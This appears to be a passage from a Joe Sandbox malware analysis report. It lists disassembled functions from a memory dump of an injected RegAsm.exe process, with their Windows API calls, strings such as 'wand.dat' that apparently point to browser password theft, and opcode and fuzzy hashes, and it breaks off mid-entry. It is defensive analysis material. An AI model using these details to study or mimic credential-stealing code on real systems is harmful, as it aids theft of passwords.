                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                • String ID: \StringFileInfo\
                                                • API String ID: 102104167-2245444037
                                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004100FB
                                                • memset.MSVCRT ref: 00410112
                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                • _snwprintf.MSVCRT ref: 00410141
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                • String ID: </%s>
                                                • API String ID: 3400436232-259020660
                                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040D58D
                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                • String ID: caption
                                                • API String ID: 1523050162-4135340389
                                                • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                • String ID: MS Sans Serif
                                                • API String ID: 210187428-168460110
                                                • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040560C
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                • String ID: *.*$dat$wand.dat
                                                • API String ID: 2618321458-1828844352
                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00412057
                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                • String ID:
                                                • API String ID: 3550944819-0
                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                Download Yara Rule
                                                APIs
                                                • free.MSVCRT ref: 0040F561
                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$free
                                                • String ID: g4@
                                                • API String ID: 2888793982-2133833424
                                                • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004144E7
                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                • memset.MSVCRT ref: 0041451A
                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                • String ID:
                                                • API String ID: 1127616056-0
                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                • malloc.MSVCRT ref: 00417459
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                • free.MSVCRT ref: 0041747F
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$freemalloc
                                                • String ID:
                                                • API String ID: 2605342592-0
                                                • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                • RegisterClassW.USER32(?), ref: 00412428
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                • String ID:
                                                • API String ID: 2678498856-0
                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040F673
                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                • strlen.MSVCRT ref: 0040F6A2
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040F6E2
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                • strlen.MSVCRT ref: 0040F70D
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                • String ID:
                                                • API String ID: 2754987064-0
                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcscpy$CloseHandle
                                                • String ID: General
                                                • API String ID: 3722638380-26480598
                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                • String ID:
                                                • API String ID: 764393265-0
                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Time$System$File$LocalSpecific
                                                • String ID:
                                                • API String ID: 979780441-0
                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$DialogHandleModuleParam
                                                • String ID:
                                                • API String ID: 1386444988-0
                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcschr.MSVCRT ref: 0040F79E
                                                • wcschr.MSVCRT ref: 0040F7AC
                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcschr$memcpywcslen
                                                • String ID: "
                                                • API String ID: 1983396471-123907689
                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • _snwprintf.MSVCRT ref: 0040A398
                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _snwprintfmemcpy
                                                • String ID: %2.2X
                                                • API String ID: 2789212964-323797159
                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040E770
                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: MessageSendmemset
                                                • String ID: F^@
                                                • API String ID: 568519121-3652327722
                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??3@DeleteObject
                                                • String ID: r!A
                                                • API String ID: 1103273653-628097481
                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcslen.MSVCRT ref: 0040B1DE
                                                • free.MSVCRT ref: 0040B201
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                • free.MSVCRT ref: 0040B224
                                                • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$memcpy$mallocwcslen
                                                • String ID:
                                                • API String ID: 726966127-0
                                                • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • strlen.MSVCRT ref: 0040B0D8
                                                • free.MSVCRT ref: 0040B0FB
                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                • free.MSVCRT ref: 0040B12C
                                                • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$memcpy$mallocstrlen
                                                • String ID:
                                                • API String ID: 3669619086-0
                                                • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
